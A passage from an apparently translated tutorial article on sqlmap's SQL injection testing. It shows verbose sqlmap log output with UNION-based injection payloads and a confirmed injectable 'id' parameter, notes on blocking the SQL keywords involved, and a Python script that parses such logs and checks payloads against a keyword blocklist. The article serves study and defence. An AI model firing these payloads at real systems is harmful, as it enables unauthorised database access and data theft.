[09:37:08] [PAYLOAD] -8945 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (39=39) THEN 1 ELSE 0 END),0x7162717671)-- qohR
[09:37:08] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:08] [PAYLOAD] -2184 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (83 39) THEN 1 ELSE 0 END),0x7162717671)-- vJmq
[09:37:08] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:37:08] [DEBUG] performed 1 queries in 0.13 seconds
[09:37:08] [DEBUG] checking for parameter length constrainting mechanisms
[09:37:08] [PAYLOAD] -6805 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (6024=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                6024) THEN 1 ELSE 0 END),0x7162717671)-- aqzt
[09:37:08] [DEBUG] performed 1 queries in 0.02 seconds
[09:37:08] [DEBUG] checking for filtered characters
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
[09:37:08] [DEBUG] used the default behaviour, running in batch mode
sqlmap identified the following injection point(s) with a total of 87 HTTP(s) requests:
---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-1722 UNION ALL SELECT NULL,CONCAT(0x71787a7671,0x417a6144526d48684971744f484c49585966416b4b66736851446c6d53787a63446b41705a715747,0x7162717671)-- Nyot
    Vector:  UNION ALL SELECT NULL,[QUERY][GENERIC_SQL_COMMENT]
---

If UNION is blocked, it errors out.

If SELECT is blocked, it also errors out.

If CONCAT is blocked, it also fails.

Blocking CASE likewise.
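The false-positive check in the log above, turned into a small piece of log analysis. This is an added example, not sqlmap's code and not from the original post. It reads sqlmap -v 3 log lines, pairs each PAYLOAD with whether the server answered it with an HTTP error, works out what each CASE WHEN condition should evaluate to on the database, and recognises the six-probe confirmation sequence sqlmap uses: true, false, false, false, true, then a deliberately malformed condition such as "(51 24)" that must error (in the log above this round repeats five times, once per --level). It also reports which of the keywords blocked in the experiments above (UNION, SELECT, CONCAT, CASE) each probe depends on, which is why blocking any one of them makes the UNION technique fail. The SAMPLE_LOG lines are copied from the output above; the function names, regexes and the BLOCKLIST tuple are my own.

```python
import re
from typing import List, Tuple

# Log lines copied from the sqlmap -v 3 output above (first of its five
# confirmation rounds). The "(51 24)" probe is sqlmap's deliberately
# malformed condition, not a transcription error.
SAMPLE_LOG = """\
[09:37:07] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[09:37:07] [PAYLOAD] -1466 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (17=17) THEN 1 ELSE 0 END),0x7162717671)-- hZgY
[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:07] [PAYLOAD] -6665 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (17=24) THEN 1 ELSE 0 END),0x7162717671)-- YsNa
[09:37:07] [DEBUG] performed 1 queries in 0.02 seconds
[09:37:07] [PAYLOAD] -4215 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (17=51) THEN 1 ELSE 0 END),0x7162717671)-- ejrD
[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:07] [PAYLOAD] -8306 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (51=24) THEN 1 ELSE 0 END),0x7162717671)-- yobT
[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:07] [PAYLOAD] -8304 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (24=24) THEN 1 ELSE 0 END),0x7162717671)-- Gyxy
[09:37:07] [DEBUG] performed 1 queries in 0.01 seconds
[09:37:07] [PAYLOAD] -4122 UNION ALL SELECT NULL,CONCAT(0x71787a7671,(CASE WHEN (51 24) THEN 1 ELSE 0 END),0x7162717671)-- zULK
[09:37:07] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:37:07] [DEBUG] performed 1 queries in 0.14 seconds
"""

PAYLOAD_RE = re.compile(r"\[PAYLOAD\] (.*)$")
HTTP_ERROR_RE = re.compile(r"got HTTP error code: (\d+)")
# The CASE WHEN condition: "(17=17)", or the malformed "(51 24)" with no operator.
CONDITION_RE = re.compile(r"CASE WHEN \((\d+)([= ])(\d+)\)")

# Outcome sqlmap expects from each of the six probes, in order. The last one
# must error, because an invalid statement must never come back as "true".
FALSE_POSITIVE_PATTERN = [True, False, False, False, True, "invalid"]

# Keywords the author blocked one at a time in the experiments above.
BLOCKLIST = ("UNION", "SELECT", "CONCAT", "CASE")


def parse_probes(log: str) -> List[Tuple[str, bool]]:
    """Return (payload, server_errored) pairs. sqlmap prints the HTTP error,
    if any, on the line(s) that follow the [PAYLOAD] line."""
    probes: List[list] = []
    for line in log.splitlines():
        m = PAYLOAD_RE.search(line)
        if m:
            probes.append([m.group(1), False])
        elif HTTP_ERROR_RE.search(line) and probes:
            probes[-1][1] = True
    return [(payload, errored) for payload, errored in probes]


def expected_outcome(payload: str):
    """True/False for a well-formed "(a=b)" condition, "invalid" for the
    malformed form, None when the payload carries no CASE WHEN condition."""
    m = CONDITION_RE.search(payload)
    if not m:
        return None
    left, op, right = m.groups()
    if op != "=":
        return "invalid"
    return left == right


def matches_false_positive_check(log: str) -> bool:
    """True when the log contains sqlmap's confirmation sequence and the server
    behaved like a genuine injection point: five clean answers for the
    well-formed probes, then an HTTP error for the malformed one."""
    probes = parse_probes(log)
    outcomes = [expected_outcome(p) for p, _ in probes]
    errored = [e for _, e in probes]
    n = len(FALSE_POSITIVE_PATTERN)
    for i in range(len(outcomes) - n + 1):
        if outcomes[i:i + n] == FALSE_POSITIVE_PATTERN and errored[i:i + n] == [False] * (n - 1) + [True]:
            return True
    return False


def blocked_keywords(payload: str, blocklist=BLOCKLIST) -> List[str]:
    """Blocklisted keywords the payload relies on (whole word, case-insensitive)."""
    return [kw for kw in blocklist if re.search(r"\b%s\b" % kw, payload, re.IGNORECASE)]


def keyword_hit_counts(log: str, blocklist=BLOCKLIST) -> dict:
    """How many probes in the log each blocklisted keyword would stop."""
    counts = {kw: 0 for kw in blocklist}
    for payload, _ in parse_probes(log):
        for kw in blocked_keywords(payload, blocklist):
            counts[kw] += 1
    return counts


if __name__ == "__main__":
    for payload, errored in parse_probes(SAMPLE_LOG):
        print(expected_outcome(payload), "HTTP error" if errored else "ok", blocked_keywords(payload))
    print("confirmation sequence seen:", matches_false_positive_check(SAMPLE_LOG))
    print(keyword_hit_counts(SAMPLE_LOG))
```

Every probe in the round hits all four keywords, which matches the experiments above: whichever of UNION, SELECT, CONCAT or CASE is blocked, the confirmation sequence cannot complete and sqlmap gives up on the UNION technique. A keyword blocklist only changes which probe fails, though; the query itself stays injectable until the id value is passed to the database as a bound parameter rather than concatenated into the statement.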

That is all on how to study the injection techniques sqlmap uses. Hopefully the above is of some help and you have learned something new. If you found the article useful, share it so that more people can see it.

Article title: How to study the injection techniques sqlmap uses. Publisher: 亿速云. Please credit the source when reposting: https://worktile.com/kb/p/24740
